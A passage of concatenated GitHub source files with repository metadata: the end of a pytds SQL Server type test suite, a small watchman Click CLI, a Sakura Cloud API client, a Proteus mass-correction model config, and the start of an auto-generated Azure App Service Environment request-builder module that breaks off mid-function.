test_val(SmallIntType(), 2 ** 15 - 1)
test_val(IntType(), 2 ** 31 - 1)
test_val(BigIntType(), 2 ** 63 - 1)
test_val(IntType(), None)
test_val(RealType(), 0.25)
test_val(FloatType(), 0.25)
test_val(RealType(), None)
test_val(SmallDateTimeType(), datetime(1900, 1, 1, 0, 0, 0))
test_val(SmallDateTimeType(), datetime(2079, 6, 6, 23, 59, 0))
test_val(DateTimeType(), datetime(1753, 1, 1, 0, 0, 0))
test_val(DateTimeType(), datetime(9999, 12, 31, 23, 59, 59, 990000))
test_val(DateTimeType(), None)
if pytds.tds_base.IS_TDS73_PLUS(self.conn._conn):
test_val(DateType(), date(1, 1, 1))
test_val(DateType(), date(9999, 12, 31))
test_val(DateType(), None)
test_val(TimeType(precision=0), time(0, 0, 0))
test_val(TimeType(precision=6), time(23, 59, 59, 999999))
test_val(TimeType(precision=0), None)
test_val(DateTime2Type(precision=0), datetime(1, 1, 1, 0, 0, 0))
test_val(DateTime2Type(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999))
test_val(DateTime2Type(precision=0), None)
test_val(DateTimeOffsetType(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999, utc))
test_val(DateTimeOffsetType(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999, tzoffset(14)))
test_val(DateTimeOffsetType(precision=0), datetime(1, 1, 1, 0, 0, 0, tzinfo=tzoffset(-14)))
#test_val(DateTimeOffsetType(precision=0), datetime(1, 1, 1, 0, 0, 0, tzinfo=tzoffset(14)))
test_val(DateTimeOffsetType(precision=6), None)
test_val(DecimalType(scale=6, precision=38), Decimal('123.456789'))
test_val(DecimalType(scale=6, precision=38), None)
test_val(SmallMoneyType(), Decimal('-214748.3648'))
test_val(SmallMoneyType(), Decimal('214748.3647'))
test_val(MoneyType(), Decimal('922337203685477.5807'))
test_val(MoneyType(), Decimal('-922337203685477.5808'))
test_val(MoneyType(), None)
test_val(UniqueIdentifierType(), None)
test_val(UniqueIdentifierType(), uuid.uuid4())
if pytds.tds_base.IS_TDS71_PLUS(self.conn._conn):
test_val(VariantType(), None)
#test_val(self.conn._conn.type_factory.SqlVariant(10), 100)
test_val(VarBinaryType(size=10), b'')
test_val(VarBinaryType(size=10), b'testtest12')
test_val(VarBinaryType(size=10), None)
test_val(VarBinaryType(size=8000), b'x' * 8000)
test_val(VarCharType(size=10), None)
test_val(VarCharType(size=10), '')
test_val(VarCharType(size=10), 'test')
test_val(VarCharType(size=8000), 'x' * 8000)
test_val(NVarCharType(size=10), u'')
test_val(NVarCharType(size=10), u'testtest12')
test_val(NVarCharType(size=10), None)
test_val(NVarCharType(size=4000), u'x' * 4000)
test_val(TextType(), None)
test_val(TextType(), '')
test_val(TextType(), 'hello')
test_val(NTextType(), None)
test_val(NTextType(), '')
test_val(NTextType(), 'hello')
test_val(ImageType(), None)
test_val(ImageType(), b'')
test_val(ImageType(), b'test')
if pytds.tds_base.IS_TDS72_PLUS(self.conn._conn):
test_val(VarBinaryMaxType(), None)
test_val(VarBinaryMaxType(), b'')
test_val(VarBinaryMaxType(), b'testtest12')
test_val(VarBinaryMaxType(), b'x' * (10 ** 6))
test_val(NVarCharMaxType(), None)
test_val(NVarCharMaxType(), 'test')
test_val(NVarCharMaxType(), 'x' * (10 ** 6))
test_val(VarCharMaxType(), None)
test_val(VarCharMaxType(), 'test')
test_val(VarCharMaxType(), 'x' * (10 ** 6))
test_val(XmlType(), '<root/>')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds70(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS70
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds71(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS71
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
def test_transaction(self):
self.conn.rollback()
self.conn.commit()
def test_bulk(self):
f = StringIO("42\tfoo\n74\tbar\n")
with self.conn.cursor() as cur:
cur.copy_to(f, 'bulk_insert_table', schema='myschema', columns=('num', 'data'))
cur.execute('select num, data from myschema.bulk_insert_table')
self.assertListEqual(cur.fetchall(), [(42, 'foo'), (74, 'bar')])
def test_call_proc(self):
with self.conn.cursor() as cur:
val = 45
values = cur.callproc('testproc', (val, default, output(value=1)))
#self.assertEqual(cur.fetchall(), [(val,)])
self.assertEqual(val + 2, values[2])
self.assertEqual(val + 2, cur.get_proc_return_status())
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds72(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS72
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds73A(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS73A
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds73B(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS73B
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestRawBytes(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['bytes_to_unicode'] = False
kwargs['database'] = 'master'
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_fetch(self):
cur = self.conn.cursor()
self.assertIsInstance(cur.execute_scalar("select cast('abc' as nvarchar(max))"), six.text_type)
self.assertIsInstance(cur.execute_scalar("select cast('abc' as varchar(max))"), six.binary_type)
self.assertIsInstance(cur.execute_scalar("select cast('abc' as text)"), six.binary_type)
self.assertIsInstance(cur.execute_scalar("select %s", ['abc']), six.text_type)
self.assertIsInstance(cur.execute_scalar("select %s", [b'abc']), six.binary_type)
rawBytes = six.b('\x01\x02\x03')
self.assertEquals(rawBytes, cur.execute_scalar("select cast(0x010203 as varchar(max))"))
self.assertEquals(rawBytes, cur.execute_scalar("select %s", [rawBytes]))
utf8char = six.b('\xee\xb4\xba')
self.assertEquals(utf8char, cur.execute_scalar("select %s", [utf8char]))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_invalid_block_size():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'blocksize': 4000,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute_scalar("select '{}'".format('x' * 8000))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_readonly_connection():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'readonly': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute_scalar("select 1")
| {
"content_hash": "037ecca350cc6aeae046a7144df95cbe",
"timestamp": "",
"source": "github",
"line_count": 1085,
"max_line_length": 155,
"avg_line_length": 37.13732718894009,
"alnum_prop": 0.5886732516007346,
"repo_name": "tpow/pytds",
"id": "876e6c0ec6b63031a42e1001a56a1d551c54daf1",
"size": "40325",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/all_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "437"
},
{
"name": "Python",
"bytes": "492620"
},
{
"name": "Shell",
"bytes": "403"
}
],
"symlink_target": ""
} |
"""
Watchman command line tool
"""
import click
from watchman import Watchman
# Disable the warning that Click displays (as of Click version 5.0) when users
# use unicode_literals in Python 2.
# See http://click.pocoo.org/dev/python3/#unicode-literals for more details.
click.disable_unicode_literals_warning = True
@click.group()
def main():
"""Watchman command line tool."""
pass
@main.command()
def sync():
"""Start watching sources."""
Watchman.sync()
@main.command()
def worker():
"""Start watchman worker."""
Watchman.work()
@main.command()
def configure():
"""Configure watchman."""
Watchman.configure()
| {
"content_hash": "f2fbe2788985298ddabe21d6298f033b",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 78,
"avg_line_length": 20.3125,
"alnum_prop": 0.6876923076923077,
"repo_name": "skcript/watchman",
"id": "46af5c4fd66a10c5a4b49fbcf514a32deca56f07",
"size": "676",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "watchman/cli/cli.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "13153"
},
{
"name": "Shell",
"bytes": "2965"
}
],
"symlink_target": ""
} |
from six.moves import urllib
from six.moves.urllib.error import URLError, HTTPError
import json, re, base64
import contextlib
from ..errors.exceptionfactory import ExceptionFactory
class Client(object):
def __init__(self, token, secret):
self.config = {
'api_root': 'https://secure.sakura.ad.jp/cloud/',
'api_root_suffix': None
}
self.set_access_key(token, secret)
@staticmethod
def native2haxe(r, depth):
return r
@staticmethod
def haxe2native(r, depth):
return r
def clone_instance(self):
instance = self.__class__(self.config['token'], self.config['secret'])
instance.set_api_root(self.config['api_root'])
instance.set_api_root_suffix(self.config['api_root_suffix'])
return instance
def set_api_root(self, url):
self.config['api_root'] = url
def set_api_root_suffix(self, suffix):
self.config['api_root_suffix'] = suffix
def set_access_key(self, token, secret):
self.config['token'] = token
self.config['secret'] = secret
auth_bytes = (token+':'+secret).encode('utf-8')
self.config['authorization'] = 'Basic ' + base64.b64encode(auth_bytes).decode("utf-8")
def request(self, method, path, params={}):
method = method.upper()
if path[0] != '/':
path = '/' + path
params_json = json.dumps(params).encode(encoding='ascii')
if method == 'GET':
if params_json is not None:
path += '?' + urllib.parse.quote(params_json)
params_json = None
if path[0:4] != 'http':
url_root = self.config['api_root']
if self.config['api_root_suffix'] is not None:
if re.compile('is1[v-z]').match(self.config['api_root_suffix']):
url_root = re.compile('/cloud/$').sub('/cloud-test/', url_root)
url_root += self.config['api_root_suffix'];
url_root = re.compile('/?$').sub('/', url_root)
if url_root[-1:] != '/':
url_root += '/'
path = url_root + 'api/cloud/1.1' + path
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': self.config['authorization'],
'User-Agent': 'saklient.python ver-0.0.6 rev-705e6fc541c30cec41e72e5e531418d64f196863',
'X-Requested-With': 'XMLHttpRequest',
'X-Sakura-No-Authenticate-Header': '1',
'X-Sakura-HTTP-Method': method,
'X-Sakura-Request-Format': 'json',
'X-Sakura-Response-Format': 'json',
'X-Sakura-Error-Level': 'warning'
}
res = ''
try:
req = urllib.request.Request(path, params_json, headers)
with contextlib.closing(urllib.request.urlopen(req)) as page:
for line in page.readlines():
res += line.decode('utf-8')
except HTTPError as ex:
res = ex.read().decode('utf8', 'ignore')
ret = None
try:
ret = json.loads(res)
except Exception as ex2:
pass
if not isinstance(ret, dict):
ret = {"error_code":None, "error_msg":None}
raise ExceptionFactory.create(ex.code, ret["error_code"], ret["error_msg"]);
return json.loads(res)
| {
"content_hash": "c24920f414a40c2ee7199c0563b7605d",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 99,
"avg_line_length": 37.630434782608695,
"alnum_prop": 0.5427498555748123,
"repo_name": "sakura-internet/saklient.python",
"id": "1ed1e2a8030383fc71fbb96674ffbfb427076983",
"size": "3487",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "saklient/cloud/client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "610037"
},
{
"name": "Shell",
"bytes": "874"
}
],
"symlink_target": ""
} |
from proteus import *
from proteus.default_p import *
from marin import *
from proteus.mprans import MCorr
LevelModelType = MCorr.LevelModel
coefficients = MCorr.Coefficients(LSModel_index=2,V_model=0,me_model=4,VOFModel_index=1,
applyCorrection=applyCorrection,nd=nd,checkMass=False,useMetrics=useMetrics,
epsFactHeaviside=epsFact_consrv_heaviside,
epsFactDirac=epsFact_consrv_dirac,
epsFactDiffusion=epsFact_consrv_diffusion)
class zero_phi:
def __init__(self):
pass
def uOfX(self,X):
return 0.0
def uOfXT(self,X,t):
return 0.0
initialConditions = {0:zero_phi()}
| {
"content_hash": "6ef09a1aaa786707635a6d7df2ab85aa",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 110,
"avg_line_length": 28.692307692307693,
"alnum_prop": 0.6072386058981233,
"repo_name": "erdc-cm/air-water-vv",
"id": "42a7ee5945e575f7e59d3588a50b3e6bdc36a0e8",
"size": "746",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "3d/marin/ls_consrv_p.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1128"
},
{
"name": "GLSL",
"bytes": "3787"
},
{
"name": "Jupyter Notebook",
"bytes": "8264154"
},
{
"name": "M",
"bytes": "435"
},
{
"name": "Python",
"bytes": "1992474"
},
{
"name": "Shell",
"bytes": "14414"
}
],
"symlink_target": ""
} |
from typing import Any, Callable, Dict, Iterable, List, Optional, TypeVar, Union, cast
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._vendor import MixinABC, _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments")
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_by_resource_group_request(
resource_group_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.AppServiceEnvironmentResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if force_delete is not None:
_params['forceDelete'] = _SERIALIZER.query("force_delete", force_delete, 'bool')
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_update_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.AppServiceEnvironmentPatchResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_capacities_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_vip_info_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_change_vnet_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.VirtualNetworkProfile] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_diagnostics_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_diagnostics_item_request(
resource_group_name: str,
name: str,
diagnostics_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"diagnosticsName": _SERIALIZER.url("diagnostics_name", diagnostics_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_inbound_network_dependencies_endpoints_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/inboundNetworkDependenciesEndpoints") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_pools_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
